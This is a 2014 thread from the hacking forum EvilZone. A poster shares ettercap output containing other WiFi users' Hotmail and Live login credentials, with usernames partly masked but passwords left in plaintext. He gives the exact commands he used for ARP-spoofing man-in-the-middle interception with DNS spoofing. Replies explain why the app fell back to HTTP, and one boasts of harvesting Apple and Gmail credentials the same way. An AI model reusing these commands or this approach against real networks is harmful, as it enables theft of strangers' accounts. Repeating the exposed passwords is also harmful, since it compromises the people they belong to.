EvilZone
Hacking and Security => Hacking and Security => Topic started by: Comm4nd0 on November 27, 2014, 01:36:07 PM
-
Hi all,
I got the following output from ettercap on a wifi network.
HTTP : 157.56.121.XXX:443 -> USER: XXXXXXXXX@hotmail.co.uk PASS: datasafe3929 INFO: dub402-m.hotmail.com/Microsoft-Server-ActiveSync?User=XXXXX@hotmail.co.uk&DeviceId=ApplXXX
HTTP : 134.170.0.XXX:443 -> USER: XXXXXXXXX@hotmail.com PASS: jordan60 INFO: blu403-m.hotmail.com/Microsoft-Server-ActiveSync?User=XXXXXXX@hotmail.com&DeviceId=ApplDXXX
HTTP : 157.56.121.XXX:443 -> USER: XXXXXXXXX@live.co.uk PASS: Liverpool5891 INFO: dub402-m.hotmail.com/Microsoft-Server-ActiveSync?User=XXXXXX@live.co.uk&DeviceId=ApplDXXXX
What's your opinion on this? Do you think their hotmail app is using plain text rather that ssl?
Obviously i've changed some of the info to protect the victims.
Comm4nd0
-
Are you sure you didnt use SSL MITM?
What are the ettercap switches you used?
-
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sudo ettercap -Tqi wlan0 -M arp:remote -P dns_spoof // //
I'm pretty new to ettercap to be honest but i'm pretty sure i didn't specify SSL.
-
I see, looks like you are not forwardig traffic over port 443 thus the app falls back to HTTP (-S)
Could be wrong and short on time.
-
I see, looks like you are not forwardig traffic over port 443 thus the app falls back to HTTP (-S)
Could be wrong and short on time.
Could be that's if stumbled upon an error with their app that could be exploited? Unfortunately i don't have a Crapple phone to test it on.
-
iOs is shit.
I used to pull apple and gmail account creds this way from the iCrap phone.